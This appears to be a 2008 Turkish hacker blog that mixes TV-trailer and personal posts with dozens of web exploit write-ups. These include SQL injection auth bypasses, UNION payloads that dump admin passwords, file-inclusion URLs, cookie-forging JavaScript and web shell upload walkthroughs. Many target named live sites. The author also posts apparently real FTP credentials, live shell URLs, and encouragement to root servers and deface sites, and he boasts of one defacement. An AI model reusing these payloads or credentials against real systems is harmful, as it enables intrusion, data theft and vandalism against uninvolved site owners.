"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

28 Kasım 2008 Cuma

Star Articles 6.0 Remote File Upload Vulnerability

Star Articles 6.0 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7251

Discovered By: ZoRLu

expl:

http://script//authorphoto/user_name[id].php

example:

http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )

hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bir cok site var. ya rootlayýn yada tek tek cakIn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)

http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F

bu serverdaki bir site icin:

ftp://ftp.ababy.com.au/ ( ftp pass ve username )

user: kiddybab

pass: KidEw1nk08

ne biliyim iste biseler yapmaya calIsIn amacIm yardImcı olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)


first register for site

after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )

click to gozat button and select your shell after upload you shell

more after go repat edit profile page and you look you photo. right click to you photo

select to properties copy photo link and paste you explorer.

go your shell

examp:

user: trt-turk@hotmail.com

passwd: zorlu1

login:

http://www.lcfarticles.com/user.login.php

shell:

http://www.lcfarticles.com//authorphoto/zorlu40.php

27 Kasım 2008 Perşembe

Kurtlar Vadisi Pusu 48. Bölüm Fragman

bu bölümde ben pek heycan göremedim önemli birşey yakalayamadım umarım iyi bi bölüm olur

TIKLA iZLE

25 Kasım 2008 Salı

FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability

FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability

link: http://www.milw0rm.com/exploits/7229

Discovered By: ZoRLu

file:

include/header.php

exp:

http://localhost/script/include/header.php?config_path=ZoRLu.txt?

Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities

Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7228

Discovered By: ZoRLu

exp for demo:

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )

XSS for demo:

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=[XSS]

Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities

Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7227

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu ( or dont write anything )

note: generally admin name: admin


exploit for demo:

http://www.chipmunk-scripts.com/topsites/login.php

username: admin ' or ' 1=1--

passwd: ZoRLu ( or dont write anything )

or

username: zorlu ' or ' 1=1--

passwd: ZoRLu ( or dont write anything )


XSS:

http://www.arcade-classics.net/top100/index.php?start=[XSS]

Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability

Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability

link: http://www.milw0rm.com/exploits/7225

Discovered By: ZoRLu

file: rss-0.1/lib/action/rss.php

c0de:

include_once("$lib/class/page.php");
include_once("$lib/share/link.php");
include_once("$lib/share/stdio.php");
include_once("$lib/share/string.php");

exp:

http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?

24 Kasım 2008 Pazartesi

Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities

Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7215

Discovered By: ZoRLu

exploit:

http://localhost/script/lyrics.php?section=full&id=[SQL]

http://localhost/script/info.php?section=[XSS]

[SQL]

99999999+union+select+1,name,3,pass,5+from+admin--


example:

http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--

login:

http://www.caro-kunde.de/login.php


XSS:

http://www.caro-kunde.de/info.php?section=[XSS]

23 Kasım 2008 Pazar

PG Job Site (poll_view_id) Blind SQL Injection Vulnerability

PG Job Site (poll_view_id) Blind SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7202

Discovered By: ZoRLu

exploit for demo: ( you must login to site after you test this links. you look left for two link)

http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )

http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )

PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability

PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7201

Discovered By: ZoRLu

dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


exploit for demo:

login: http://www.realtysoft.pro/roommate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu

PG Real Estate (Auth Bypass) SQL Injection Vulnerability

PG Real Estate (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7200

Discovered By: ZoRLu

dork: "Powered by PG Real Estate Solution - real estate web site design"

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


exploit for demo:

login: http://www.realtysoft.pro/realestate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu

lütfen demoları hacklemeyin - pls you dont make hack demos

ya arkadaşlar küçük bir ricam olacak demoları hacklemeyin ki yeni acıkları bulabilelim lütfen. şimdi demo hacklenince ben veya diğer arkadaşlarımız nerden scripti bulup test edecek ? diyceksiniz dork yok onuda sizler bulun. geçenlerde bir arkadaşla konuşuyorduk dorkları kendileri bulabiliyolarmış yani sizlerde bulabilirsiniz. demo hacklemek süper bir iş deil misal:

http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php

bu sitenin serverın da yüzlerce site vardı madem hackliycektiniz onları hackleseydiniz demoya dokunmasaydınız. lütfen arkadaşlar bu konuda biraz hassas olalım.

getaphpsite Auto Dealers Remote File Upload Vulnerability

getaphpsite Auto Dealers Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7189

Discovered By: ZoRLu msn: trt-turk@hotmail.com

first register to site

login to site and edit your profile

upload your_shell.php

your_shell.php path:

localhost/script/re_images/[ID]_logo_your_shell.php

example for demo:

login: http://www.getaphpsite.com/demos/cardealers/login.php

user: zorlu

passwd: zorlu1

shell:

http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php

getaphpsite Real Estate Remote File Upload Vulnerability

getaphpsite Real Estate Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7188

Discovered By: ZoRLu

first register to site

login to site and edit your profile

upload your_shell.php

your_shell.php path:

localhost/script/re_images/[ID]_logo_your_shell.php

example for demo:

login: http://www.getaphpsite.com/demos/realty/login.php

user: zorlu

passwd: zorlu1

shell:

http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php

21 Kasım 2008 Cuma

zehir4.asp download

zehir4 asp shell işinize yarayabilir

link 1: TIKLA iNDiR



link 2: TIKLA iNDiR

20 Kasım 2008 Perşembe

Kurtlar Vadisi Pusu 47. Bölüm Fragman

polat aga gürayın boynunu kırıyor yine artistliğini yaptı ama yakışıyor adama :D

TIKLA iZLE

18 Kasım 2008 Salı

Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability

Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7144

Discovered By: ZoRLu

exploit for demo:

http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )

http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )

15 Kasım 2008 Cumartesi

mola : (

artık nete vs bir süreliğine ara veriyorum bug 45 te kaldı. inş nasip olurda dönersem kaldığım yerden devam edecem ama öncelikli olarak bu kpss işini halletmem lazım. ara ara nete girerim yine : ) hadi kolay gele by by

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7124

Discovered By: ZoRLu

Exploit: sql inj

http://localhost/script/admin.php?a=users&id=[SQL]


[SQL]

999+union+select+1,user(),database(),version(),5,6,7--


sql for demo:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--


xss:

http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]

X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability

X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7123

Discovered By: ZoRLu

Exploit:

username: ZoRLu or anything write

password: ' or ' 1=1--


login for demo:

http://x7chat2demo.hostx7.com/

username: ZoRLu

password: ' or ' 1=1--

14 Kasım 2008 Cuma

GS Real Estate Portal US/International Module Multiple Vulnerabilities

GS Real Estate Portal US/International Module Multiple Vulnerabilities

link: http://www.milw0rm.com/exploits/7117

Discovered By: ZoRLu

Exploit 1: sql inj

http://localhost/script/email.php?AgentID=[SQL]


[SQL]

-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--


sql for demo:

http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--



Exploit 2: auth bypass

login: http://localhost/script/login.php

username: [real_admin_or_user_name] ' or ' 1=1--

password: ZoRLu

note: generally admin name: admin


bypass for demo:

login: http://hostnomi.net/int/login.php

admin: admin ' or ' 1=1--

passwd: ZoRLu


exploit 3: Rfu

you login to site and edit your profile upload your_shell.php

after right click to your logo and select properties. copy photo link.

paste your explorer go your_shell.php


your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php


rfu for demo:

user: zorlu

passwd: zorlu1

edit profile: http://hostnomi.net/int/profile.php

shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )



exploit 4: XSS

http://localhost/script/email.php?AgentID=&ListingID=[XSS]

xss for demo:

http://hostnomi.net/int/email.php?AgentID=&ListingID=[XSS]

netcat download

shell attığınızda root olabilmek için önce nolması lazım bir adet netcat : ) işte size netcat işinize yarar diye düşündüm

edit:

link yenilendi

//ZoRLu

TIKLA iNDiR


netcat.exe yi c:\windows\system32 buraya sallayın

BosClassifieds hack video

yönetmen: ZoRLu : )

BosClassifieds md5 kırdıktan sonra napabiliriz küçük bir tavsiye mahiyetinde bir video md5 kırıp admin panele girdikten sonra shellimizi upload ediyoruz ama nasıl

TIKLA iZLE


( rar pass: z0rlu.blogspot.com )

bu fakelerin modası geçmedi mi henüz : )




gecenler de bir mail aldım yok efendim hotmail ekibindenmiş güncelleme yapmalıymışım da oymuşda buymuşda : ) yahu arkadaş daha klass daha süper yöntemler çıktı hack için bari onları kullansana : ) hem mailimi hackleyip napacan ben trt-turk@hotmail.com u sadece msn olarak kullanıyorum yani kişi listesinden başka hiç bi halta dokunamazsın ki : ) hem gel insan gibi iste şifreyi vereyim msn listesi doldu zaten silmekten bi hal oldum :) he benim msn mi kimse hackleyemez de demiyorum buda bilinsin geçenlerde hacklenmişti bile bi tanesi : ) neyse uzun lafın kısası yemeyin böle emailleri yok live ekibi yok sifreni ver vs boş bunlar

ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln

ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln

link: http://www.milw0rm.com/exploits/7110

Discovered By: ZoRLu

Exploit:

http://localhost/script/re_images/[id]_logo_your_shell.php

you register to site

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you go profile edit

profile: http://localhost/script/profile.php

and you upload your_shell.php right click to your logo and select properties copy link

paste your explorer go your_shell.php

your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php

ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln

ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln

link: http://www.milw0rm.com/exploits/7111

Discovered By: ZoRLu

Exploit:

http://localhost/script/cars_images/[id]_logo_your_shell.php

you register to site

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you go profile edit

profile: http://localhost/script/profile.php

and you upload your_shell.php right click to your logo and select properties copy link

paste your explorer go your_shell.php

your_shell.php path:

http://localhost/script/cars_images/[id]_logo_your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php

ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability

ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7112

Discovered By: ZoRLu

dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )

Exploit:

http://localhost/script/pictures/[id]your_shell.php

you register to site

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you click to "Add a Recipe" and add recipe

and after click to "View your Recipes" click to you recipe open new page

right click to your photo. select properties copy photo lick

and paste your explorer go your shell

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2:

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )

misal:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )

13 Kasım 2008 Perşembe

Kurtlar Vadisi Pusu 46. Bölüm Fragman

polat abimiz tam dosyaları teslim edip gönderdiği zaman süper bi süpriz ile karşılaşıyor. izleyin görün. biraz da bozuluyor herhalde : ) )


TIKLA iZLE

AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln

AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7103

Discovered By: ZoRLu

Exploit:

username: ZoRLu

password: ' or ' 1=1--


admin login for demo:

http://www.hyperstop.com/demo/webhost/

username: ZoRLu

password: ' or ' 1=1--

AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln

AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7102

Discovered By: ZoRLu

Exploit:

localhost/script/admin/admin.php

username: ' or ' 1=1--

password: ZoRLu



admin login for demo:

http://www.blizsoft.com/article/admin/admin.php

username: ' or ' 1=1--

password: ZoRLu

AlstraSoft SendIt Pro Remote File Upload Vulnerability

AlstraSoft SendIt Pro Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7101

Discovered By: ZoRLu

dork: "Powered by AlstraSoft SendIt Pro"

Exploit:

you save your shell like this: shell.php.pjpeg

warning: filetype not php.jpeg

like this: filetype: php.pjpeg

after you go site

Recipients' e-mail address: write anything

Select file : select your_shell.php.pjpeg

Your e-mail address: email

Message to send to recipient : write anything

and click to send button after you see link and clik to that link

you go your_shell.php.pjpeg :

localhost/script/send/files/[id]shell.php.pjpeg

example for demo:

http://www.blizsoft.com/send/files/84019shell.php.pjpeg


11 Kasım 2008 Salı

a.q gecenin bu saatinde ödev hazırlıyorum : (


a.q sanmayın öss yi kazanınca herşey tamam eğer öyle düşünüyorsanız avucunuzu yalarsınız bilesiniz. insan sanıyor üni. de rahat edecem ama nerde : ) gecenin 3 üne geliyor saat ben halen ödev yapıyorum. adaletin bu mu dünya ? : ) )

PHPStore Real Estate Remote File Upload Vulnerability

PHPStore Real Estate Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7085

Author: ZoRLu

exploit:


first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

login to site and edit your profile

upload your_shell.php

your_shell.php path:

localhost/script/re_images/[ID]_logo_your_shell.php

---------------------------------------------

user: zorlu

passwd: zorlu1

shell: ( not permission for demo server )

http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php


http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )


PHPStore Complete Classifieds Script File Upload Vulnerability

PHPStore Complete Classifieds Script File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7084

Author: ZoRLu

exploit:


first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

login to site and Add Listing click open the new page upload logo (upload your_shell.php)

your_shell.php path:

localhost/script/yellow_images/[ID]_logo_your_shell.php

---------------------------------------------

example for demo:

login: http://www.phpstore.info/demos/cars/login.php

user: zorlu

passwd: zorlu1

shell: ( not permission for demo server )

http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php


http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )


PHPStore PHP Job Search Script Remote File Upload Vulnerability

PHPStore PHP Job Search Script Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7083

Author: ZoRLu

exploit:


you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you register site and this site questions your photo. you upload your_shell.php

you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )

you must see your photo

and right click to your photo select to properites

after copy photo link and paste your explorer go your shell

your_shell.php

http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php


---------------------------------------------

example for demo:

shell: ( not permission for demo server )

http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php


http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )


PHPStore Car Dealers Remote File Upload Vulnerability

PHPStore Car Dealers Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7082

Author: ZoRLu


exploit:


first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

login to site and edit your profile

upload your_shell.php

your_shell.php path:

localhost/script/cars_images/[ID]_logo_your_shell.php

---------------------------------------------

example for demo:

login: http://www.phpstore.info/demos/cars/login.php

user: zorlu

passwd: zorlu1

shell:

http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php


9 Kasım 2008 Pazar

Galatasaray - fenerbahçe 4-1

ilk golü biz attık adamlar 1 e 4 attı hay a.q : ) neyse cimbomum ne diyelim geçmiş olsun canımız saolsun : ) ) yensen de yenilsen de bizim takımımızsın seni seviyoruz en büyük cimbom

Ali Kınık - Asın Beni

Ali Kınık'ın süper bir parçası tavsiye ederim dinlemenizi

"Hor görüldü sevdalarım"
"Vatan için kavgalarım"
"Ben küçülmeden yaşarım"
"isterseniz asın beni"
"Bir şafak vakti"

TIKLA iNDiR

8 Kasım 2008 Cumartesi

ZEEJOBSITE 2.0 Remote File Upload Vulnerability

ZEEJOBSITE 2.0 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7062

author: ZoRLu

exploit:

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php


after jobseekers login to site ( direckt link: localhost/jobseekers/jobseekerloginpage.php )

and you edit your profile ( direckt link: http://localhost/jobseekers/editresume_next.php?rid=[id] )

add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties

copy photo link and paste your explorer go your shell

your_shell:

localhost/script_path/jobseekers/logos/[id].php


example for demo:

user: sabrina

passwd: testing:

login: http://zeejobsite.com/jobseekers/jobseekerloginpage.php

change profile direckt link: http://zeejobsite.com/jobseekers/editresume_next.php?rid=47

and your_shell link:

http://zeejobsite.com/jobseekers/logos/7271406.php

zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities

zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7058

author: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php


after login to site and you change your profile ( direckt link: localhost/viewprofile.php )

add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties

copy photo link and paste your explorer go your shell

your_shell:

localhost/script_path/companylogo/[id].php


example for demo:

user: zeeways

passwd: testing:

change profile direckt link: http://www.zeeproperty.com/viewprofile.php

and your_shell link:

http://www.zeeproperty.com/companylogo/5622365.php


XSS for demo:

http://www.zeeproperty.com/view_prop_details.php?propid=[XSS]

7 Kasım 2008 Cuma

DeltaScripts PHP Classifieds <= 7.5 SQL Injection Vulnerability

DeltaScripts PHP Classifieds <= 7.5 SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7047

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/detail.php?siteid=[SQL]

[SQL]=

-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*

live sites:

http://www.deltascripts.com/phpclassifieds/livesites

for example:

http://www.saabcentral.com/classifieds/detail.php?siteid=-99999999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+user/*


MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability

MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7046

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyCalendar/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability

MyioSoft EasyBookMarker (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7045

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyBookMarker/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability

MyioSoft Ajax Portal 3.0 (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7044

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/AjaxPortal/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

Güneşin Oğlu Fragman

özgü namal ve haluk bilginerin yeni filmi güzele benziyor : )

TIKLA iZLE

E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln

E-topbiz Online Store 1 (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7041

author: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


for demo:

http://e-topbiz.com/trafficdemos/store1/admin/login.php

username: admin ' or ' 1=1--

password: ZoRLu

DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability

DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7025

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://demo.deltascripts.com/phpshop/admin/login.php


example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu


DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln

DeltaScripts PHP Links <= 1.3 (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7024

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin



admin login for demo:

http://demo.deltascripts.com/classifieds/admin/login.php


example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu



example 2:

admin login:

http://www.maramuresul-istoric.ro/anunturi/admin/login.php



admin: admin ' or ' 1=1

passwd: ZoRLu


DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln

DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7023

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin



admin login for demo:

http://demo.deltascripts.com/classifieds/admin/login.php


example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu



example 2:

admin login:

http://www.maramuresul-istoric.ro/anunturi/admin/login.php



admin: admin ' or ' 1=1

passwd: ZoRLu


5 Kasım 2008 Çarşamba

kurtlar vadisi pusu 45. bölüm fragman şükür kavuşturana : )

polat kaçıyor yine eski koltuğuna oturuyor beklenen mutlu son : ) )

TIKLA iZLE

3 Kasım 2008 Pazartesi

kpss çalışcam a.q kpss : (

yav bıktım bu sınavlardan bir ara öss idi şimdi kpss : ( bütün sınavların a.q : ) )

online rekorunu bugün kırdı sitem :)


bugün z0rlu.blogspot.com tarihinin rekorunu kırdı ve online sayısı 9 a ulaştı ne mutlu bana : )

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

Apoll 0.7b (SQL Injection) Remote Auth Bypass Vulnerability

link: http://www.milw0rm.com/exploits/6969

Discovered By: ZoRLu

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty


file:

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
$num = @mysql_num_rows($mysql);



MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability

MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6967

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/view.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

example:

http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

BosDev BosClassifieds (cat_id) SQL Injection Vulnerability

BosDev BosClassifieds (cat_id) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6962

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/index.php?cat_id=[SQL]

[SQL]=

-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

example 1: ( you must look title )

http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com )

example 2: ( you must look title )

http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--

2 Kasım 2008 Pazar

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

Joovili 3.1.4 Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/6955

Discovered By: ZoRLu

demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/


exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";


for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";

Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities

Apartment Search Script (RFU/XSS) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/6956

Discovered By: ZoRLu

exploit:

http://localhost/script_path/Member_Admin/logo/[id]your_shell.php

XSS

http://localhost/script_path/listtest.php?r=[XSS]

example 1 (demo):

http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php

example 2:

